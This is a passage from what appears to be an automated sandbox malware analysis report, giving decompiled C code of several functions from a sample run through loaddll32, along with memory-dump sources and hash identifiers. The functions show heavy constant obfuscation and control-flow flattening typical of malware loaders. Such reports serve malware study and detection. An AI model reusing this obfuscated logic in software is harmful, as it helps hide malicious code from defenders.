                          				_v1140 = _v1140 * 3;
                          				_v1140 = _v1140 | 0x54c49d95;
                          				_v1140 = _v1140 + 0xffffe0ec;
                          				_v1140 = _v1140 ^ 0x55e75198;
                          				_v1108 = 0xd76cc6;
                          				_v1108 = _v1108 | 0x05cc2328;
                          				_v1108 = _v1108 ^ 0x05dcca41;
                          				_v1076 = 0x1bbfa4;
                          				_v1076 = _v1076 * 0x15;
                          				_v1076 = _v1076 ^ 0x02435ecc;
                          				_v1084 = 0x2803a8;
                          				_v1084 = _v1084 << 0xd;
                          				_v1084 = _v1084 ^ 0x007964fc;
                          				_v1092 = 0x1abb48;
                          				_v1092 = _v1092 ^ 0xd0321100;
                          				_v1092 = _v1092 ^ 0xd024152f;
                          				_v1120 = 0x1b785b;
                          				_v1120 = _v1120 + 0x6594;
                          				_v1120 = _v1120 ^ 0xc9bc1812;
                          				_v1120 = _v1120 ^ 0xc9a1a482;
                          				_v1056 = 0xf96b0d;
                          				_v1056 = _v1056 | 0x7a81934f;
                          				_v1056 = _v1056 ^ 0x7af06d17;
                          				_v1116 = 0xc0176d;
                          				_t328 = 0x57;
                          				_v1116 = _v1116 / _t328;
                          				_v1116 = _v1116 ^ 0x000c7a92;
                          				_v1144 = 0x386a20;
                          				_v1144 = _v1144 >> 0xa;
                          				_t329 = 0x41;
                          				_v1144 = _v1144 * 0x35;
                          				_v1144 = _v1144 + 0xffff2f3c;
                          				_v1144 = _v1144 ^ 0x00015cc7;
                          				_v1124 = 0xfe7131;
                          				_v1124 = _v1124 >> 4;
                          				_v1124 = _v1124 + 0xffffd592;
                          				_v1124 = _v1124 ^ 0x000ea5e3;
                          				_v1172 = 0xf233ef;
                          				_v1172 = _v1172 / _t329;
                          				_v1172 = _v1172 >> 8;
                          				_v1172 = _v1172 >> 7;
                          				_v1172 = _v1172 ^ 0x000dfea7;
                          				_v1088 = 0xf13b31;
                          				_v1088 = _v1088 << 4;
                          				_v1088 = _v1088 ^ 0x0f1b90b2;
                          				_v1060 = 0x8432f0;
                          				_v1060 = _v1060 + 0xf898;
                          				_v1060 = _v1060 ^ 0x00806ced;
                          				_v1096 = 0x8a20ae;
                          				_v1096 = _v1096 + 0xffff5c91;
                          				_v1096 = _v1096 ^ 0x008c8276;
                          				_v1072 = 0xbc3343;
                          				_v1072 = _v1072 | 0xeb032685;
                          				_v1072 = _v1072 ^ 0xebbb8611;
                          				_v1104 = 0xb5445c;
                          				_v1104 = _v1104 | 0x38284c17;
                          				_v1104 = _v1104 ^ 0x38b8f1ba;
                          				_v1152 = 0x20ddec;
                          				_t330 = 0x69;
                          				_v1152 = _v1152 * 0x4d;
                          				_v1152 = _v1152 >> 1;
                          				_v1152 = _v1152 << 0xc;
                          				_v1152 = _v1152 ^ 0x15fd1151;
                          				_v1132 = 0xda9d4d;
                          				_v1132 = _v1132 / _t330;
                          				_v1132 = _v1132 ^ 0x63ba58ef;
                          				_v1132 = _v1132 ^ 0x63ba5da3;
                          				_v1080 = 0xcf1222;
                          				_v1080 = _v1080 | 0x484758e4;
                          				_v1080 = _v1080 ^ 0x48c184f1;
                          				_v1064 = 0x309461;
                          				_v1064 = _v1064 + 0xffffd409;
                          				_v1064 = _v1064 ^ 0x00392de5;
                          				_v1164 = 0xd882bd;
                          				_t331 = 0xc;
                          				_v1164 = _v1164 / _t331;
                          				_v1164 = _v1164 + 0x74b;
                          				_v1164 = _v1164 >> 3;
                          				_v1164 = _v1164 ^ 0x00039f5a;
                          				_v1160 = 0x7a48e2;
                          				_v1160 = _v1160 ^ 0x69cb0a8d;
                          				_v1160 = _v1160 ^ 0x1624d419;
                          				_v1160 = _v1160 >> 9;
                          				_v1160 = _v1160 ^ 0x00301506;
                          				_v1168 = 0x1f51cb;
                          				_v1168 = _v1168 ^ 0x7c6813be;
                          				_v1168 = _v1168 * 0x65;
                          				_v1168 = _v1168 + 0xffff91bf;
                          				_v1168 = _v1168 ^ 0x1b097545;
                          				_v1068 = 0x9ab8d;
                          				_v1068 = _v1068 + 0x88f0;
                          				_v1068 = _v1068 ^ 0x000186e4;
                          				E00D3556B(_t331);
                          				do {
                          					while(_t364 != 0x62623fc) {
                          						if(_t364 == 0x81770e6) {
                          							return E00D4654A(_v1160, _v1168, __eflags,  &_v520, _v1068,  &_v1040);
                          						}
                          						if(_t364 == 0xe065299) {
                          							_push(_v1124);
                          							_push(_v1144);
                          							_push(_v1116);
                          							_t319 = E00D4E1F8(0xd31080, _v1056, __eflags);
                          							_t320 = E00D3DC1B(_v1172);
                          							_t340 =  *0xd56214; // 0x0
                          							_t321 =  *0xd56214; // 0x0
                          							E00D544AD(_v1060, __eflags, _v1096,  &_v1040, _t321 + 0x23c, _v1072, _v1104, _t319, _t340 + 0x34, _t320, _v1152);
                          							_t315 = E00D4FECB(_t319, _v1132, _v1080, _v1064, _v1164);
                          							_t368 =  &(_t368[0xf]);
                          							_t364 = 0x81770e6;
                          							continue;
                          						}
                          						if(_t364 != 0xe958b9c) {
                          							goto L8;
                          						}
                          						_t364 = 0x62623fc;
                          					}
                          					_push(_v1128);
                          					_push(_v1112);
                          					_push(_v1148);
                          					_t310 = E00D4E1F8(0xd31000, _v1156, __eflags);
                          					_t333 =  *0xd56214; // 0x0
                          					_t312 =  *0xd56214; // 0x0
                          					__eflags = _t312 + 0x23c;
                          					E00D52D0A(_v1100, _t312 + 0x23c, _t312 + 0x23c, _v1184, _v1140, _v1108, _t333 + 0x34,  &_v520, _t333 + 0x34, _t310);
                          					_t315 = E00D4FECB(_t310, _v1076, _v1084, _v1092, _v1120);
                          					_t368 =  &(_t368[0xe]);
                          					_t364 = 0xe065299;
                          					L8:
                          					__eflags = _t364 - 0xc2e12c9;
                          				} while (__eflags != 0);
                          				return _t315;
                          			}

                          0x00d52401
                          0x00d52406
                          0x00d5240e
                          0x00d52416
                          0x00d52423
                          0x00d52427
                          0x00d5242f
                          0x00d52437
                          0x00d52442
                          0x00d5244d
                          0x00d52460
                          0x00d52474
                          0x00d52474
                          0x00d5247e
                          0x00000000
                          0x00d525e3
                          0x00d52486
                          0x00d52498
                          0x00d524a1
                          0x00d524a5
                          0x00d524b0
                          0x00d524bb
                          0x00d524c7
                          0x00d524de
                          0x00d52506
                          0x00d52523
                          0x00d52528
                          0x00d5252b
                          0x00000000
                          0x00d5252b
                          0x00d5248e
                          0x00000000
                          0x00000000
                          0x00d52494
                          0x00d52494
                          0x00d52532
                          0x00d5253b
                          0x00d5253f
                          0x00d52547
                          0x00d5254c
                          0x00d52571
                          0x00d5257d
                          0x00d52587
                          0x00d525a7
                          0x00d525ac
                          0x00d525af
                          0x00d525b1
                          0x00d525b1
                          0x00d525b1
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: j8$qUO$-9$Hz$XGH
                          • API String ID: 0-60989354
                          • Opcode ID: 31809dea7421f2c6cde156d6ac30371e17d77f7c2e43d83c3f2fe210fa333028
                          • Instruction ID: 9df645d7c9a2b3ba0395f6800f1a0e249b6e07b106b0952ffa7f39df92b34e1a
                          • Opcode Fuzzy Hash: 31809dea7421f2c6cde156d6ac30371e17d77f7c2e43d83c3f2fe210fa333028
                          • Instruction Fuzzy Hash: 20E132714097809FC3A8CF24C98AA5BBBF1FBC4748F508A1CF9D986260D7B48948CF52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E00D53EE9() {
                          				intOrPtr _t261;
                          				intOrPtr _t262;
                          				void* _t268;
                          				signed char _t274;
                          				intOrPtr _t277;
                          				signed int _t288;
                          				intOrPtr _t289;
                          				signed char _t296;
                          				signed int _t316;
                          				intOrPtr _t326;
                          				intOrPtr _t330;
                          				signed int _t333;
                          				signed int _t334;
                          				signed int _t335;
                          				signed int _t336;
                          				signed int _t337;
                          				signed int _t338;
                          				intOrPtr _t342;
                          				void* _t344;
                          
                          				 *(_t344 + 0x70) =  *(_t344 + 0x70) & 0x00000000;
                          				 *(_t344 + 0x74) =  *(_t344 + 0x74) & 0x00000000;
                          				_t288 = 0x4bd14f4;
                          				 *((intOrPtr*)(_t344 + 0x6c)) = 0x2dbabe;
                          				 *(_t344 + 0x4c) = 0x48601c;
                          				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) | 0x68876aab;
                          				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x68cba8bf;
                          				 *(_t344 + 8) = 0xdbf1f3;
                          				 *(_t344 + 0x18) =  *(_t344 + 8) * 9;
                          				_t333 = 0x4c;
                          				 *(_t344 + 0x1c) =  *(_t344 + 0x18) / _t333;
                          				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) << 0xd;
                          				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x4172a216;
                          				 *(_t344 + 0x3c) = 0x6d1b19;
                          				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) | 0x79048263;
                          				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) >> 5;
                          				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0x03cbeeb4;
                          				 *(_t344 + 0x18) = 0x1a2d0d;
                          				 *(_t344 + 0x18) =  *(_t344 + 0x18) >> 6;
                          				_t334 = 9;
                          				 *(_t344 + 0x18) =  *(_t344 + 0x18) / _t334;
                          				 *(_t344 + 0x18) =  *(_t344 + 0x18) + 0xffff8a27;
                          				 *(_t344 + 0x18) =  *(_t344 + 0x18) ^ 0xfffbe0f3;
                          				 *(_t344 + 0x5c) = 0xa7cc6c;
                          				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) >> 4;
                          				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) ^ 0x000a2772;
                          				 *(_t344 + 0x38) = 0x67bd1;
                          				_t335 = 0x3d;
                          				 *(_t344 + 0x38) =  *(_t344 + 0x38) / _t335;
                          				 *(_t344 + 0x38) =  *(_t344 + 0x38) << 0x10;
                          				 *(_t344 + 0x38) =  *(_t344 + 0x38) ^ 0x1b333388;
                          				 *(_t344 + 0x28) = 0xde9e16;
                          				 *(_t344 + 0x28) =  *(_t344 + 0x28) | 0xff1d3c4c;
                          				_t336 = 6;
                          				 *(_t344 + 0x28) =  *(_t344 + 0x28) / _t336;
                          				_t337 = 0x70;
                          				 *(_t344 + 0x24) =  *(_t344 + 0x28) / _t337;
                          				 *(_t344 + 0x24) =  *(_t344 + 0x24) ^ 0x006adbe6;
                          				 *(_t344 + 0x20) = 0xac092b;
                          				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xc14e4d03;
                          				 *(_t344 + 0x20) =  *(_t344 + 0x20) + 0x9f69;
                          				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0x18e1fb77;
                          				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xd908b9ac;
                          				 *(_t344 + 0x3c) = 0xd958f8;
                          				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xf9ce44cf;
                          				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) << 0xe;
                          				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xc707f990;
                          				 *(_t344 + 0x1c) = 0x265505;
                          				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xffff5b39;
                          				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0x9a51;
                          				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xc9e0;
                          				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x00291d5e;
                          				 *(_t344 + 0x4c) = 0xea08b8;
                          				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0xb1227b65;
                          				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) * 0x47;
                          				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x4e906ac6;
                          				 *(_t344 + 0x60) = 0x906ac9;
                          				_t338 = 0x13;
                          				_t330 =  *((intOrPtr*)(_t344 + 0x78));
                          				_t342 =  *((intOrPtr*)(_t344 + 0x78));
                          				 *(_t344 + 0x60) =  *(_t344 + 0x60) * 3;
                          				 *(_t344 + 0x60) =  *(_t344 + 0x60) ^ 0x01b02f9b;
                          				 *(_t344 + 0x48) = 0xe018a0;
                          				 *(_t344 + 0x48) =  *(_t344 + 0x48) >> 3;
                          				 *(_t344 + 0x48) =  *(_t344 + 0x48) << 4;
                          				 *(_t344 + 0x48) =  *(_t344 + 0x48) ^ 0x01c3463d;
                          				 *(_t344 + 0x44) = 0xcf92eb;
                          				 *(_t344 + 0x44) =  *(_t344 + 0x44) | 0xa78abf74;
                          				 *(_t344 + 0x44) =  *(_t344 + 0x44) + 0x2871;
                          				 *(_t344 + 0x44) =  *(_t344 + 0x44) ^ 0xa7cf65bf;
                          				 *(_t344 + 0x40) = 0xa30b5e;
                          				 *(_t344 + 0x40) =  *(_t344 + 0x40) / _t338;
                          				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b52837;
                          				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b9bcfc;
                          				 *(_t344 + 0x50) = 0x1f98d4;
                          				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x1ce7877d;
                          				 *(_t344 + 0x50) =  *(_t344 + 0x50) >> 9;
                          				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x000a2579;
                          				 *(_t344 + 0x64) = 0x5b61ba;
                          				 *(_t344 + 0x64) =  *(_t344 + 0x64) + 0xffffd71d;
                          				 *(_t344 + 0x64) =  *(_t344 + 0x64) ^ 0x005007f5;
                          				 *(_t344 + 0x2c) = 0xb4bbf5;
                          				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x03029a47;
                          				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) >> 0xf;
                          				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b7d07c;
                          				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b00a56;
                          				 *(_t344 + 0x28) = 0x1351a7;
                          				 *(_t344 + 0x28) =  *(_t344 + 0x28) >> 9;
                          				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0xc8bf819f;
                          				 *(_t344 + 0x28) =  *(_t344 + 0x28) * 0x2d;
                          				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0x49a4694e;
                          				 *(_t344 + 0x70) = 0x74ba7c;
                          				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3ad619e0;
                          				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3aa46fbb;
                          				 *(_t344 + 0x30) = 0x6db52d;
                          				 *(_t344 + 0x30) =  *(_t344 + 0x30) << 9;
                          				 *(_t344 + 0x30) =  *(_t344 + 0x30) + 0xffffb915;
                          				 *(_t344 + 0x30) =  *(_t344 + 0x30) | 0x57796199;
                          				 *(_t344 + 0x30) =  *(_t344 + 0x30) ^ 0xdf7399d9;
                          				 *(_t344 + 0x54) = 0x4f3eba;
                          				 *(_t344 + 0x54) =  *(_t344 + 0x54) + 0xffff5dec;
                          				 *(_t344 + 0x54) =  *(_t344 + 0x54) << 7;
                          				 *(_t344 + 0x54) =  *(_t344 + 0x54) ^ 0x274d646c;
                          				while(1) {
                          					L1:
                          					_t316 =  *(_t344 + 0x68);
                          					while(1) {
                          						L2:
                          						_t261 =  *((intOrPtr*)(_t344 + 0x6c));
                          						L3:
                          						while(_t288 != 0x42bf5b6) {
                          							if(_t288 == 0x434f657) {
                          								_push( *(_t344 + 0x1c));
                          								_push( *(_t344 + 0x40));
                          								_push( *(_t344 + 0x28));
                          								 *((char*)(_t344 + 0x1f)) =  *((intOrPtr*)(_t330 + 1));
                          								 *(_t344 + 0x1e) =  *((intOrPtr*)(_t330 + 3));
                          								_t268 = E00D4E1F8(0xd31758,  *(_t344 + 0x30), __eflags);
                          								_push( *(_t330 + 2) & 0x000000ff);
                          								E00D3F96F( *(_t344 + 0x74), __eflags, 0x10,  *(_t344 + 0x3f) & 0x000000ff, _t268,  *(_t344 + 0x1e) & 0x000000ff,  *((intOrPtr*)(_t344 + 0x84)), _t342 + 0x20,  *(_t330 + 2) & 0x000000ff,  *(_t344 + 0x60),  *((intOrPtr*)(_t344 + 0x58)),  *(_t344 + 0x50));
                          								_t223 = _t344 + 0x5c; // 0xa2772
                          								E00D4FECB(_t268,  *((intOrPtr*)(_t344 + 0x90)),  *((intOrPtr*)(_t344 + 0xa0)),  *(_t344 + 0x64),  *_t223);
                          								_t344 = _t344 + 0x40;
                          								 *(_t342 + 0x14) = ( *(_t330 + 4) & 0x000000ff) << 0x00000008 |  *(_t330 + 5) & 0x000000ff;
                          								_t274 =  *((intOrPtr*)(_t330 + 6));
                          								_t296 =  *((intOrPtr*)(_t330 + 7));
                          								_t330 = _t330 + 8;
                          								_t288 = 0x42bf5b6;
                          								 *(_t342 + 0x44) = (_t274 & 0x000000ff) << 0x00000008 | _t296 & 0x000000ff;
                          								goto L1;
                          							} else {
                          								if(_t288 == 0x4bd14f4) {
                          									_t326 =  *0xd56228; // 0x0
                          									_t288 = 0x70ba79f;
                          									_t316 = _t326 + 0x14;
                          									 *(_t344 + 0x68) = _t316;
                          									goto L2;
                          								} else {
                          									if(_t288 == 0x70ba79f) {
                          										_t277 = E00D43D85( *(_t344 + 0x60), 0xd56000, __eflags, _t344 + 0x78,  *(_t344 + 0x18));
                          										_t316 =  *(_t344 + 0x70);
                          										_t330 = _t277;
                          										 *((intOrPtr*)(_t344 + 0x7c)) = _t277;
                          										_t261 = _t277 +  *((intOrPtr*)(_t344 + 0x78));
                          										 *((intOrPtr*)(_t344 + 0x6c)) = _t261;
                          										_t288 = 0xc4a3c33;
                          										continue;
                          									} else {
                          										if(_t288 == 0x9fd5b32) {
                          											__eflags = _t330 - _t261;
                          											asm("sbb ecx, ecx");
                          											_t288 = (_t288 & 0x0165beb9) + 0xae47d7a;
                          											continue;
                          										} else {
                          											if(_t288 == 0xae47d7a) {
                          												E00D52B09( *((intOrPtr*)(_t344 + 0x78)),  *((intOrPtr*)(_t344 + 0x7c)),  *((intOrPtr*)(_t344 + 0x34)),  *(_t344 + 0x54));
                          											} else {
                          												if(_t288 != 0xc4a3c33) {
                          													L17:
                          													__eflags = _t288 - 0xd28cf5a;
                          													if(__eflags != 0) {
                          														L2:
                          														_t261 =  *((intOrPtr*)(_t344 + 0x6c));
                          														continue;
                          													}
                          												} else {
                          													_push(_t288);
                          													_push(_t288);
                          													_t342 = E00D3C5D8(0x60);
                          													_t344 = _t344 + 0xc;
                          													if(_t342 != 0) {
                          														_t288 = 0x434f657;
                          														while(1) {
                          															L1:
                          															_t316 =  *(_t344 + 0x68);
                          															while(1) {
                          																L2:
                          																_t261 =  *((intOrPtr*)(_t344 + 0x6c));
                          																goto L3;
                          															}
                          														}
                          													}
                          												}
                          											}
                          										}
                          									}
                          								}
                          							}
                          							_t289 =  *0xd56228; // 0x0
                          							 *(_t289 + 0x1c) =  *(_t289 + 0x1c) & 0x00000000;
                          							 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 0x14));
                          							__eflags = 1;
                          							return 1;
                          						}
                          						_t262 =  *0xd56228; // 0x0
                          						_t288 = 0x9fd5b32;
                          						 *_t316 = _t342;
                          						_t316 = _t342 + 0x18;
                          						 *(_t344 + 0x68) = _t316;
                          						_t235 = _t262 + 0x18;
                          						 *_t235 =  *((intOrPtr*)(_t262 + 0x18)) + 1;
                          						__eflags =  *_t235;
                          						goto L17;
                          					}
                          				}
                          			}























                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ldM'$q($r'$y%$z}
                          • API String ID: 0-1771948706
                          • Opcode ID: 643fc3e8aa3932c47640217673b2a2d7c2ce46c4cbddc42e5e99a6087b3a76fc
                          • Instruction ID: f623d27a2d7685272d4192e74a4fe7ddf318076bb27048bc95e452a99c4d85df
                          • Opcode Fuzzy Hash: 643fc3e8aa3932c47640217673b2a2d7c2ce46c4cbddc42e5e99a6087b3a76fc
                          • Instruction Fuzzy Hash: CBD15F721083809FD368CF25C48955BBFF2FB99358F148A0DF6A696260D3B5C949CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E00D3FB8E(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8) {
                          				char _v8;
                          				intOrPtr _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				signed int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				signed int _v96;
                          				signed int _v100;
                          				signed int _v104;
                          				signed int _v108;
                          				signed int _v112;
                          				signed int _v116;
                          				signed int _v120;
                          				signed int _v124;
                          				void* _t261;
                          				intOrPtr* _t284;
                          				void* _t286;
                          				intOrPtr _t294;
                          				intOrPtr* _t295;
                          				void* _t297;
                          				intOrPtr* _t299;
                          				void* _t301;
                          				void* _t325;
                          				intOrPtr* _t327;
                          				signed int _t328;
                          				signed int _t329;
                          				signed int _t330;
                          				signed int _t331;
                          				signed int _t332;
                          				signed int _t333;
                          				signed int _t334;
                          				signed int* _t337;
                          
                          				_t299 = _a4;
                          				_push(_a8);
                          				_t327 = __edx;
                          				_push(_t299);
                          				_push(__edx);
                          				_push(__ecx);
                          				E00D4FE29(_t261);
                          				_v92 = 0x4ad2af;
                          				_t337 =  &(( &_v124)[4]);
                          				_v92 = _v92 << 4;
                          				_t325 = 0;
                          				_t301 = 0xeae8bd1;
                          				_t328 = 0x27;
                          				_v92 = _v92 * 0x30;
                          				_v92 = _v92 ^ 0xe0780d01;
                          				_v32 = 0x52ecdf;
                          				_v32 = _v32 | 0x4795fc12;
                          				_v32 = _v32 ^ 0x47d7fcde;
                          				_v40 = 0x6c24d1;
                          				_v40 = _v40 + 0xffffd677;
                          				_v40 = _v40 ^ 0x006bfb48;
                          				_v124 = 0xafb159;
                          				_v124 = _v124 + 0x853c;
                          				_v124 = _v124 * 0x3c;
                          				_v124 = _v124 + 0xffffb483;
                          				_v124 = _v124 ^ 0x294c7f6f;
                          				_v116 = 0x2e5989;
                          				_v116 = _v116 << 3;
                          				_v116 = _v116 << 0xc;
                          				_v116 = _v116 + 0xffff32fd;
                          				_v116 = _v116 ^ 0x2cc3b2fd;
                          				_v104 = 0xb70fe2;
                          				_v104 = _v104 * 0x61;
                          				_v104 = _v104 >> 0xd;
                          				_v104 = _v104 >> 9;
                          				_v104 = _v104 ^ 0x00000115;
                          				_v20 = 0x29c7ba;
                          				_v20 = _v20 / _t328;
                          				_v20 = _v20 ^ 0x0001123f;
                          				_v44 = 0xd235de;
                          				_t329 = 0x19;
                          				_v44 = _v44 * 0x34;
                          				_v44 = _v44 ^ 0x2ab83bf3;
                          				_v120 = 0x2b8a20;
                          				_v120 = _v120 / _t329;
                          				_v120 = _v120 + 0xd97b;
                          				_v120 = _v120 + 0x9745;
                          				_v120 = _v120 ^ 0x00091694;
                          				_v80 = 0x44ed89;
                          				_v80 = _v80 << 8;
                          				_v80 = _v80 + 0x6d47;
                          				_v80 = _v80 ^ 0x44e06617;
                          				_v84 = 0x8c3da4;
                          				_v84 = _v84 << 3;
                          				_v84 = _v84 + 0xffff28ee;
                          				_v84 = _v84 ^ 0x04621daf;
                          				_v88 = 0x7b0e01;
                          				_t330 = 0x2a;
                          				_v88 = _v88 * 0x7e;
                          				_v88 = _v88 / _t330;
                          				_v88 = _v88 ^ 0x01771ea0;
                          				_v48 = 0xf210e7;
                          				_t331 = 0x56;
                          				_v48 = _v48 / _t331;
                          				_v48 = _v48 ^ 0x000151ed;
                          				_v52 = 0xb85aaa;
                          				_v52 = _v52 ^ 0x7279f80c;
                          				_v52 = _v52 ^ 0x72c0fdc9;
                          				_v108 = 0xe210ad;
                          				_v108 = _v108 + 0xffffc30f;
                          				_v108 = _v108 ^ 0xff005d9c;
                          				_v108 = _v108 ^ 0x468aee4e;
                          				_v108 = _v108 ^ 0xb96c249f;
                          				_v36 = 0xf02045;
                          				_t332 = 0x7e;
                          				_v36 = _v36 * 0x7d;
                          				_v36 = _v36 ^ 0x753d6877;
                          				_v76 = 0x890c0b;
                          				_v76 = _v76 | 0x3fa19484;
                          				_v76 = _v76 + 0xc76f;
                          				_v76 = _v76 ^ 0x3fa932ba;
                          				_v112 = 0xdcee96;
                          				_v112 = _v112 << 0xb;
                          				_v112 = _v112 / _t332;
                          				_v112 = _v112 ^ 0x6c4d9ccb;
                          				_v112 = _v112 ^ 0x6d94fd95;
                          				_v56 = 0x741505;
                          				_t333 = 0x1d;
                          				_v56 = _v56 / _t333;
                          				_v56 = _v56 + 0xe34c;
                          				_v56 = _v56 ^ 0x00059e64;
                          				_v24 = 0xde7835;
                          				_t334 = 0x73;
                          				_v24 = _v24 * 7;
                          				_v24 = _v24 ^ 0x0614b333;
                          				_v28 = 0x817a7e;
                          				_v28 = _v28 + 0x50ff;
                          				_v28 = _v28 ^ 0x008db9da;
                          				_v60 = 0x30460f;
                          				_v60 = _v60 | 0x5b476089;
                          				_v60 = _v60 + 0x7857;
                          				_v60 = _v60 ^ 0x5b7b85ad;
                          				_v64 = 0x3287c5;
                          				_v64 = _v64 >> 0x10;
                          				_v64 = _v64 | 0xf6bf374a;
                          				_v64 = _v64 ^ 0xf6be02d9;
                          				_v68 = 0xbf5def;
                          				_v68 = _v68 + 0xffff47b3;
                          				_v68 = _v68 + 0xffff0d11;
                          				_v68 = _v68 ^ 0x00bf58a8;
                          				_v72 = 0xc5c956;
                          				_v72 = _v72 ^ 0x0920ed5d;
                          				_v72 = _v72 / _t334;
                          				_v72 = _v72 ^ 0x00102287;
                          				_v16 = 0x6e7810;
                          				_v16 = _v16 + 0xffff2e79;
                          				_v16 = _v16 ^ 0x0061adb7;
                          				_v96 = 0xe3f1bb;
                          				_v96 = _v96 | 0x17c89f2a;
                          				_v96 = _v96 ^ 0x2d56d01e;
                          				_v96 = _v96 ^ 0x01e2669f;
                          				_v96 = _v96 ^ 0x3b5230bc;
                          				_v100 = 0x967d31;
                          				_v100 = _v100 | 0xebdf376e;
                          				_v100 = _v100 + 0x87ad;
                          				_v100 = _v100 ^ 0xebeed43d;
                          				do {
                          					while(_t301 != 0x242fff5) {
                          						if(_t301 == 0x95dc10a) {
                          							_push(_t301);
                          							_push(_t301);
                          							_t294 = E00D3C5D8(_v8);
                          							_t337 =  &(_t337[3]);
                          							_v12 = _t294;
                          							if(_t294 != 0) {
                          								_t301 = 0x242fff5;
                          								continue;
                          							}
                          						} else {
                          							if(_t301 == 0xb01d963) {
                          								_t295 =  *0xd56224; // 0x0
                          								_t297 = E00D32194(_v40, _v44, _t301, _v120, _v80, _v124, _v84, _v88, _t301, _v48,  *_t327, _v52,  &_v8,  *((intOrPtr*)(_t327 + 4)), _v92,  *_t295, _t325);
                          								_t337 =  &(_t337[0xf]);
                          								if(_t297 == _v116) {
                          									_t301 = 0x95dc10a;
                          									continue;
                          								}
                          							} else {
                          								if(_t301 == 0xb93db5b) {
                          									E00D52B09(_v16, _v12, _v96, _v100);
                          								} else {
                          									if(_t301 != 0xeae8bd1) {
                          										goto L13;
                          									} else {
                          										_t301 = 0xb01d963;
                          										continue;
                          									}
                          								}
                          							}
                          						}
                          						L17:
                          						return _t325;
                          					}
                          					_t284 =  *0xd56224; // 0x0
                          					_t286 = E00D32194(_v8, _v56, _t301, _v24, _v28, _v104, _v60, _v64, _t301, _v68,  *_t327, _v72,  &_v8,  *((intOrPtr*)(_t327 + 4)), _v32,  *_t284, _v12);
                          					_t337 =  &(_t337[0xf]);
                          					if(_t286 == _v20) {
                          						 *_t299 = _v12;
                          						_t325 = 1;
                          						 *((intOrPtr*)(_t299 + 4)) = _v8;
                          					} else {
                          						_t301 = 0xb93db5b;
                          						goto L13;
                          					}
                          					goto L17;
                          					L13:
                          				} while (_t301 != 0xf5a5c60);
                          				goto L17;
                          			}


                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Gm$L$Wx$] $wh=u
                          • API String ID: 0-1494249286
                          • Opcode ID: dc6c3330aecbe450c0f2d54dc396fb1e62dda7a123133a99ac1f8e8ea5054fdb
                          • Instruction ID: 5b0e3e43ccb52ab41e39444d80ef80867bbbdc7633a53ea581ee05507b17efa6
